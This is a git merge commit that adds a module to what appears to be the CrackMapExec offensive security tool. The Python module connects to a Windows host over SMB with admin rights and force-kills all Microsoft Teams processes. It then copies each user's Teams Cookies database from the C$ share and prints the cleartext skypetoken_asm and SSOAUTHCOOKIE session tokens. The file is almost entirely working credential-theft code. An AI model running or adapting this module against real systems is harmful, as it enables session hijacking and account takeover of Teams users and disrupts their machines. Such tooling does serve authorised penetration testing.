Merge pull request #647 from R-Secure/master

mpgn · web-flow · commit 74bbeee05a41 · 2022-10-18T20:42:53.000+02:00
Added functionality to retrieve ssoauthookie from Microsoft Teams local db
diff --git a/cme/modules/teams_localdb.py b/cme/modules/teams_localdb.py
@@ -0,0 +1,57 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+import urllib.parse
+import sqlite3
+from csv import reader
+from time import sleep
+
+class CMEModule:
+
+    name = 'teams_localdb'
+    description = "Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process"
+    supported_protocols = ['smb']
+    opsec_safe = False
+    multiple_hosts = False
+
+    def options(self, context, module_options):
+        '''
+        '''
+
+    def on_admin_login(self, context, connection):
+        context.log.info('Killing all Teams process to open the cookie file')
+        connection.execute("taskkill /F /T /IM teams.exe")
+        #sleep(3)
+        found = 0
+        paths = connection.spider('C$', folder='Users', regex=['[a-zA-Z0-9]*'], depth=0)
+        with open("/tmp/teams_cookies2.txt","wb") as f:
+            for path in paths:
+                try:
+                    connection.conn.getFile('C$', path + "/AppData/Roaming/Microsoft/Teams/Cookies", f.write)
+                    context.log.highlight("Found Cookie file in path " + path)
+                    found = 1
+                    self.parse_file(context, 'skypetoken_asm')
+                    self.parse_file(context, 'SSOAUTHCOOKIE')
+                except Exception as e:
+                    if 'STATUS_SHARING_VIOLATION' in str(e):
+                        context.log.debug(str(e))
+                        context.log.highlight("Found Cookie file in path " + path)
+                        context.log.error('Cannot retrieve file, most likely Teams is running which prevents us from retrieving the Cookies database')
+        if found == 0:
+            context.log.info('No cookie file found in Users folder')
+
+    @staticmethod
+    def parse_file(context, name):
+        try:
+            conn = sqlite3.connect('/tmp/teams_cookies2.txt')
+            c = conn.cursor()
+            c.execute("SELECT value FROM cookies WHERE name = '" + name + "'")
+            row = c.fetchone()
+            if row == None:
+                context.log.error("No " + name + " present in Microsoft Teams Cookies database")
+            else:
+                context.log.success("Succesfully extracted " + name + ": ")
+                context.log.success(row[0])
+            conn.close()
+        except Exception as e:
+            context.log.error(str(e))
